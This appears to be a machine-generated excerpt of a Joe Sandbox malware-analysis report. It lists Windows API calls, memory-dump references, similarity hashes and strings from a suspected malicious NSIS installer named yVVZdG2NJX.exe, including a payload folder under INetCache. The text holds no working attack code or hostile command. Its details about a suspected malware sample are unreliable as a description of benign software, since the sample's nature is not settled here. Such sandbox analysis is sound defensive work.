• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
• Instruction ID: a51ecd0892fb275ea92473d319bbbc5ec4fc6164fb370921ec18ec876cc9dfbc
• Opcode Fuzzy Hash: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
• Instruction Fuzzy Hash: A6D05E73E142008BD750DBB8BA8945E73A8F781319320C83BE102F1191E97888524A2D
APIs
• GlobalAlloc.KERNELBASE(00000040,?,703D123B,?,703D12DF,00000019,703D11BE,-000000A0), ref: 703D1225
Memory Dump Source
• Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
• Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 4d3c0e9c581898afb5bfd6f41a5974a93566f0f8028e31bd0de923100abef8ff
• Instruction ID: b583e39f5b15dc5b3bda74cf46100f72e3dc4f1e2aff842471bbedb9fbe40645
• Opcode Fuzzy Hash: 4d3c0e9c581898afb5bfd6f41a5974a93566f0f8028e31bd0de923100abef8ff
• Instruction Fuzzy Hash: 42B00276A44100DFFF40DB65CD46F35775CD744705F544050F706D5155D5649D148A35
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040549C
• GetDlgItem.USER32(?,000003EE), ref: 004054AB
• GetClientRect.USER32(?,?), ref: 004054E8
• GetSystemMetrics.USER32(00000002), ref: 004054EF
• SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
• ShowWindow.USER32(?,00000008), ref: 0040558B
• GetDlgItem.USER32(?,000003EC), ref: 004055AC
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
• GetDlgItem.USER32(?,000003F8), ref: 004054BA
  • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,?,0040406E), ref: 00404251
• GetDlgItem.USER32(?,000003EC), ref: 004055FE
• CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
• CloseHandle.KERNEL32(00000000), ref: 00405613
• ShowWindow.USER32(00000000), ref: 00405637
• ShowWindow.USER32(?,00000008), ref: 0040563C
• ShowWindow.USER32(00000008), ref: 00405686
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
• CreatePopupMenu.USER32 ref: 004056CB
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
• GetWindowRect.USER32(?,?), ref: 004056FF
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
• OpenClipboard.USER32(00000000), ref: 00405760
• EmptyClipboard.USER32 ref: 00405766
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
• GlobalLock.KERNEL32(00000000), ref: 0040577C
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
• GlobalUnlock.KERNEL32(00000000), ref: 004057B0
• SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
• CloseClipboard.USER32 ref: 004057C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
• Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
• Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
• Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                      • lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,?), ref: 00404866
                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404872
                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                        • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                        • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                        • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                        • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                        • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                      • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,?,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                        • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                        • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                        • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$Call
                                                                      • API String ID: 2624150263-2651886527
                                                                      • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                      • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                      • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                      • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 004021C3
                                                                      Similarity
                                                                      • API ID: CreateInstance
                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
                                                                      • API String ID: 542301482-920775469
                                                                      • Opcode ID: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                      • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                                                      • Opcode Fuzzy Hash: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                      • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                      • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                                                      • Opcode Fuzzy Hash: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                      • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A
                                                                      APIs
                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040446B
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040449C
                                                                      • GetSysColor.USER32(?), ref: 004044AD
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                      • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                      • SendMessageW.USER32(00000000), ref: 00404550
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                      • SetCursor.USER32(00000000), ref: 004045CF
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                      • SetCursor.USER32(00000000), ref: 004045EB
                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 0040461A
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                      • String ID: Call$DC@$N
                                                                      • API String ID: 3103080414-3199507676
                                                                      • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                      • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                      • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                      • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                      • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                      • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                      • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                      • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                        • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                        • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                      • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                      • wsprintfA.USER32 ref: 00405F62
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                        • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                        • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                      • String ID: %ls=%ls$[Rename]
                                                                      • API String ID: 2171350718-461813615
                                                                      APIs
                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-3316843490
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                      • GetSysColor.USER32(00000000), ref: 004042D0
                                                                      • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                      • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                      • GetSysColor.USER32(?), ref: 004042FB
                                                                      • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                      • DeleteObject.GDI32(?), ref: 00404325
                                                                      • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      APIs
                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                        • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                      • String ID: 9
                                                                      • API String ID: 163830602-2366072709
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D24DA
                                                                        • Part of subcall function 703D122C: lstrcpynW.KERNEL32(00000000,?,703D12DF,00000019,703D11BE,-000000A0), ref: 703D123C
                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 703D2460
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 703D247B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                      • String ID: @H1v
                                                                      • API String ID: 4216380887-3152185570
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                      • lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                      • lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,774D23A0), ref: 0040535A
                                                                      • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2531174081-0
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                      • GetMessagePos.USER32 ref: 00404BEC
                                                                      • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                      • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Tahoma
• API String ID: 3808545654-3580928618
APIs
• SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
• MulDiv.KERNEL32(0008AC0E,00000064,0008AC12), ref: 00402E3C
• wsprintfW.USER32 ref: 00402E4C
• SetWindowTextW.USER32(?,?), ref: 00402E5C
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
Strings
• verifying installer: %d%%, xrefs: 00402E46
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
APIs
  • Part of subcall function 703D121B: GlobalAlloc.KERNELBASE(00000040,?,703D123B,?,703D12DF,00000019,703D11BE,-000000A0), ref: 703D1225
• GlobalFree.KERNEL32(?), ref: 703D265B
• GlobalFree.KERNEL32(00000000), ref: 703D2690
Memory Dump Source
• Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
• Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
APIs
• WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: ByteCharMultiWidelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp$C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll
• API String ID: 3109718747-3433333103
APIs
Memory Dump Source
• Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,703D21F0,?,00000808), ref: 703D1639
• GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,703D21F0,?,00000808), ref: 703D1640
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,703D21F0,?,00000808), ref: 703D1654
• GetProcAddress.KERNEL32(703D21F0,00000000), ref: 703D165B
